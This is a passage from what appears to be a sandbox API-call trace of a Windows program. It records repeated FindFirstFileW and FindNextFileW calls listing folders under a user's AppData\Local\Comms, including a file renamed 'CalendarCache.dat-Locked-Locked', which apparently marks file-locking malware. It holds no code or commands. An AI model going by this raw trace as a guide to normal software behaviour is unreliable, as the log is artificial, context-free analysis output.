ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.499] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x37c4cac4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c4cac4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0311.499] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Unistore", cAlternateFileName="")) returned 1 [0311.499] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0311.499] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 0 [0311.499] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.499] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x37c4cac4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c4cac4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0311.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Unistore", cAlternateFileName="")) returned 1 [0311.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0311.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 0 [0311.500] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.500] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x37c4cac4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c4cac4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x37c4cac4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c4cac4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37c46939, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x37c46939, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c46939, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat-Locked-Locked", cAlternateFileName="CALEND~1.DAT")) returned 1 [0311.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37c46939, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x37c46939, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c46939, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat-Locked-Locked", cAlternateFileName="CALEND~1.DAT")) returned 0 [0311.501] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.501] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x37c4cac4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c4cac4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.502] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x37c4cac4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c4cac4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.502] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37c46939, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x37c46939, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c46939, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CalendarCache.dat-Locked-Locked", cAlternateFileName="CALEND~1.DAT")) returned 1 [0311.502] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0311.502] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.502] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.502] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.503] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0311.503] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.503] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.503] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.503] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0311.503] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.504] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23a0d188, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23a0d188, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c611181, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x600000, dwReserved0=0x0, dwReserved1=0x0, cFileName="store.vol", cAlternateFileName="")) returned 1 [0311.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c627099, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c673f47, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmp.edb", cAlternateFileName="")) returned 1 [0311.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239e71ab, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239e71ab, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xa8841001, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USS.chk", cAlternateFileName="")) returned 1 [0311.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c5eda5f, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USS.log", cAlternateFileName="")) returned 1 [0311.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c0dc2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239c0dc2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239c0dc2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USSres00001.jrs", cAlternateFileName="USSRES~1.JRS")) returned 1 [0311.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c0dc2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239c0dc2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239c0dc2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USSres00002.jrs", cAlternateFileName="USSRES~2.JRS")) returned 1 [0311.505] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xdd289e64, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USStmp.log", cAlternateFileName="")) returned 1 [0311.505] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xdd289e64, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USStmp.log", cAlternateFileName="")) returned 0 [0311.505] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.505] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.505] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.505] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23a0d188, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23a0d188, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c611181, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x600000, dwReserved0=0x0, dwReserved1=0x0, cFileName="store.vol", cAlternateFileName="")) returned 1 [0311.506] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c627099, ftCreationTime.dwHighDateTime=0x1d7e78c, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c673f47, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmp.edb", cAlternateFileName="")) returned 1 [0311.506] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239e71ab, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239e71ab, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xa8841001, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USS.chk", cAlternateFileName="")) returned 1 [0311.506] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c5eda5f, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USS.log", cAlternateFileName="")) returned 1 [0311.506] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c0dc2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239c0dc2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239c0dc2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USSres00001.jrs", cAlternateFileName="USSRES~1.JRS")) returned 1 [0311.506] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c0dc2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239c0dc2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239c0dc2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USSres00002.jrs", cAlternateFileName="USSRES~2.JRS")) returned 1 [0311.506] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xdd289e64, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USStmp.log", cAlternateFileName="")) returned 1 [0311.506] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0311.506] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.507] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0311.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0311.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1ad860) returned 1 [0311.511] GetCurrentActCtx (in: lphActCtx=0x1af488 | out: lphActCtx=0x1af488*=0x0) returned 1 [0311.511] ActivateActCtx (in: hActCtx=0x70b91c, lpCookie=0x1af498 | out: hActCtx=0x70b91c, lpCookie=0x1af498) returned 1 